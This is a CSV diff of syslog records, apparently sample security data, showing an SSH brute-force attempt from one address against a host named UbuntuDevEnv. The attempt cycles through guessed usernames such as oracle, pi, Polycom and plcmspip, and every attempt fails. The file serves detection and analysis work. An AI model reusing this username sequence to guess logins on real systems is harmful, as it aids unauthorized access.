+2922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:26,UbuntuDevEnv,2019-06-28 05:23:25,auth,UbuntuDevEnv,info,"Disconnecting invalid user operator 193.201.224.232 port 51074: Change of username or service not allowed: (operator,ssh-connection) -> (oracle,ssh-connection) [preauth]",94992,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,193.201.224.2,51074,,
+2923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:31,UbuntuDevEnv,2019-06-28 05:23:30,auth,UbuntuDevEnv,info,Invalid user oracle from 193.201.224.232 port 2341,95041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,193.201.224.2,2341,,
+2924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:31,UbuntuDevEnv,2019-06-28 05:23:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:31,UbuntuDevEnv,2019-06-28 05:23:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:34,UbuntuDevEnv,2019-06-28 05:23:33,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 193.201.224.232 port 2341 ssh2,95041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,193.201.224.2,2341,,
+2927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:34,UbuntuDevEnv,2019-06-28 05:23:33,auth,UbuntuDevEnv,info,"Disconnecting invalid user oracle 193.201.224.232 port 2341: Change of username or service not allowed: (oracle,ssh-connection) -> (osmc,ssh-connection) [preauth]",95041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,193.201.224.2,2341,,
+2928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:34,UbuntuDevEnv,2019-06-28 05:23:34,auth,UbuntuDevEnv,info,Bad protocol version identification 'SSH-2.0_CoreLab-1.0' from 193.201.224.232 port 33766,95072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,33766,,
+2929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:37,UbuntuDevEnv,2019-06-28 05:23:36,auth,UbuntuDevEnv,info,Invalid user osmc from 193.201.224.232 port 35631,95076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,osmc,193.201.224.2,35631,,
+2930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:37,UbuntuDevEnv,2019-06-28 05:23:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:37,UbuntuDevEnv,2019-06-28 05:23:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:39,UbuntuDevEnv,2019-06-28 05:23:39,auth,UbuntuDevEnv,info,Failed password for invalid user osmc from 193.201.224.232 port 35631 ssh2,95076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,osmc,193.201.224.2,35631,,
+2933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:40,UbuntuDevEnv,2019-06-28 05:23:39,auth,UbuntuDevEnv,info,"Disconnecting invalid user osmc 193.201.224.232 port 35631: Change of username or service not allowed: (osmc,ssh-connection) -> (patrol,ssh-connection) [preauth]",95076,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,osmc,193.201.224.2,35631,,
+2934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:41,UbuntuDevEnv,2019-06-28 05:23:40,auth,UbuntuDevEnv,info,Invalid user patrol from 193.201.224.232 port 42605,95096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,patrol,193.201.224.2,42605,,
+2935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:41,UbuntuDevEnv,2019-06-28 05:23:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:41,UbuntuDevEnv,2019-06-28 05:23:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:43,UbuntuDevEnv,2019-06-28 05:23:43,auth,UbuntuDevEnv,info,Failed password for invalid user patrol from 193.201.224.232 port 42605 ssh2,95096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,patrol,193.201.224.2,42605,,
+2938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:45,UbuntuDevEnv,2019-06-28 05:23:44,auth,UbuntuDevEnv,info,"Disconnecting invalid user patrol 193.201.224.232 port 42605: Change of username or service not allowed: (patrol,ssh-connection) -> (pi,ssh-connection) [preauth]",95096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,patrol,193.201.224.2,42605,,
+2939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:46,UbuntuDevEnv,2019-06-28 05:23:46,auth,UbuntuDevEnv,info,Invalid user pi from 193.201.224.232 port 8356,95114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,193.201.224.2,8356,,
+2940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:46,UbuntuDevEnv,2019-06-28 05:23:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:46,UbuntuDevEnv,2019-06-28 05:23:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:49,UbuntuDevEnv,2019-06-28 05:23:48,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 193.201.224.232 port 8356 ssh2,95114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,193.201.224.2,8356,,
+2943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:49,UbuntuDevEnv,2019-06-28 05:23:48,auth,UbuntuDevEnv,info,"Disconnecting invalid user pi 193.201.224.232 port 8356: Change of username or service not allowed: (pi,ssh-connection) -> (pizza,ssh-connection) [preauth]",95114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,193.201.224.2,8356,,
+2944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:49,UbuntuDevEnv,2019-06-28 05:23:49,auth,UbuntuDevEnv,info,Invalid user pizza from 193.201.224.232 port 14079,95124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pizza,193.201.224.2,14079,,
+2945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:50,UbuntuDevEnv,2019-06-28 05:23:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:50,UbuntuDevEnv,2019-06-28 05:23:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:52,UbuntuDevEnv,2019-06-28 05:23:51,auth,UbuntuDevEnv,info,Failed password for invalid user pizza from 193.201.224.232 port 14079 ssh2,95124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pizza,193.201.224.2,14079,,
+2948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:52,UbuntuDevEnv,2019-06-28 05:23:52,auth,UbuntuDevEnv,info,"Disconnecting invalid user pizza 193.201.224.232 port 14079: Change of username or service not allowed: (pizza,ssh-connection) -> (plcmspip,ssh-connection) [preauth]",95124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pizza,193.201.224.2,14079,,
+2949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:54,UbuntuDevEnv,2019-06-28 05:23:54,auth,UbuntuDevEnv,info,Invalid user plcmspip from 193.201.224.232 port 17591,95142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plcmspip,193.201.224.2,17591,,
+2950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:54,UbuntuDevEnv,2019-06-28 05:23:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:54,UbuntuDevEnv,2019-06-28 05:23:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:57,UbuntuDevEnv,2019-06-28 05:23:56,auth,UbuntuDevEnv,info,Failed password for invalid user plcmspip from 193.201.224.232 port 17591 ssh2,95142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plcmspip,193.201.224.2,17591,,
+2953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:57,UbuntuDevEnv,2019-06-28 05:23:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:23:58,UbuntuDevEnv,2019-06-28 05:23:58,auth,UbuntuDevEnv,info,Failed password for invalid user plcmspip from 193.201.224.232 port 17591 ssh2,95142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plcmspip,193.201.224.2,17591,,
+2955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:01,UbuntuDevEnv,2019-06-28 05:24:00,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:01,UbuntuDevEnv,2019-06-28 05:24:00,auth,UbuntuDevEnv,info,"Disconnecting invalid user plcmspip 193.201.224.232 port 17591: Change of username or service not allowed: (plcmspip,ssh-connection) -> (PlcmSpIp,ssh-connection) [preauth]",95142,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plcmspip,193.201.224.2,17591,,
+2957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:03,UbuntuDevEnv,2019-06-28 05:24:03,auth,UbuntuDevEnv,info,Invalid user PlcmSpIp from 193.201.224.232 port 50270,95174,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PlcmSpIp,193.201.224.2,50270,,
+2958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:04,UbuntuDevEnv,2019-06-28 05:24:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95174,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:04,UbuntuDevEnv,2019-06-28 05:24:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95174,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:05,UbuntuDevEnv,2019-06-28 05:24:05,auth,UbuntuDevEnv,info,Failed password for invalid user PlcmSpIp from 193.201.224.232 port 50270 ssh2,95174,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PlcmSpIp,193.201.224.2,50270,,
+2961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:06,UbuntuDevEnv,2019-06-28 05:24:05,auth,UbuntuDevEnv,info,"Disconnecting invalid user PlcmSpIp 193.201.224.232 port 50270: Change of username or service not allowed: (PlcmSpIp,ssh-connection) -> (plcmspip,ssh-connection) [preauth]",95174,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PlcmSpIp,193.201.224.2,50270,,
+2962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:08,UbuntuDevEnv,2019-06-28 05:24:07,auth,UbuntuDevEnv,info,Invalid user plcmspip from 193.201.224.232 port 56799,95197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plcmspip,193.201.224.2,56799,,
+2963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:08,UbuntuDevEnv,2019-06-28 05:24:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:08,UbuntuDevEnv,2019-06-28 05:24:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:10,UbuntuDevEnv,2019-06-28 05:24:09,auth,UbuntuDevEnv,info,Failed password for invalid user plcmspip from 193.201.224.232 port 56799 ssh2,95197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plcmspip,193.201.224.2,56799,,
+2966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:10,UbuntuDevEnv,2019-06-28 05:24:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:12,UbuntuDevEnv,2019-06-28 05:24:12,auth,UbuntuDevEnv,info,Failed password for invalid user plcmspip from 193.201.224.232 port 56799 ssh2,95197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plcmspip,193.201.224.2,56799,,
+2968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:13,UbuntuDevEnv,2019-06-28 05:24:12,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:13,UbuntuDevEnv,2019-06-28 05:24:12,auth,UbuntuDevEnv,info,"Disconnecting invalid user plcmspip 193.201.224.232 port 56799: Change of username or service not allowed: (plcmspip,ssh-connection) -> (pmd,ssh-connection) [preauth]",95197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plcmspip,193.201.224.2,56799,,
+2970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:17,UbuntuDevEnv,2019-06-28 05:24:16,auth,UbuntuDevEnv,info,Invalid user pmd from 193.201.224.232 port 14623,95217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pmd,193.201.224.2,14623,,
+2971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:17,UbuntuDevEnv,2019-06-28 05:24:16,auth,UbuntuDevEnv,info,Failed none for invalid user pmd from 193.201.224.232 port 14623 ssh2,95217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pmd,193.201.224.2,14623,,
+2972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:18,UbuntuDevEnv,2019-06-28 05:24:17,auth,UbuntuDevEnv,info,"Disconnecting invalid user pmd 193.201.224.232 port 14623: Change of username or service not allowed: (pmd,ssh-connection) -> (poll,ssh-connection) [preauth]",95217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pmd,193.201.224.2,14623,,
+2973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:19,UbuntuDevEnv,2019-06-28 05:24:18,auth,UbuntuDevEnv,info,Invalid user poll from 193.201.224.232 port 33256,95232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,poll,193.201.224.2,33256,,
+2974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:19,UbuntuDevEnv,2019-06-28 05:24:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:19,UbuntuDevEnv,2019-06-28 05:24:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:21,UbuntuDevEnv,2019-06-28 05:24:20,auth,UbuntuDevEnv,info,Failed password for invalid user poll from 193.201.224.232 port 33256 ssh2,95232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,poll,193.201.224.2,33256,,
+2977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:21,UbuntuDevEnv,2019-06-28 05:24:21,auth,UbuntuDevEnv,info,"Disconnecting invalid user poll 193.201.224.232 port 33256: Change of username or service not allowed: (poll,ssh-connection) -> (Polycom,ssh-connection) [preauth]",95232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,poll,193.201.224.2,33256,,
+2978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:23,UbuntuDevEnv,2019-06-28 05:24:22,auth,UbuntuDevEnv,info,Invalid user Polycom from 193.201.224.232 port 37519,95251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Polycom,193.201.224.2,37519,,
+2979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:24,UbuntuDevEnv,2019-06-28 05:24:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
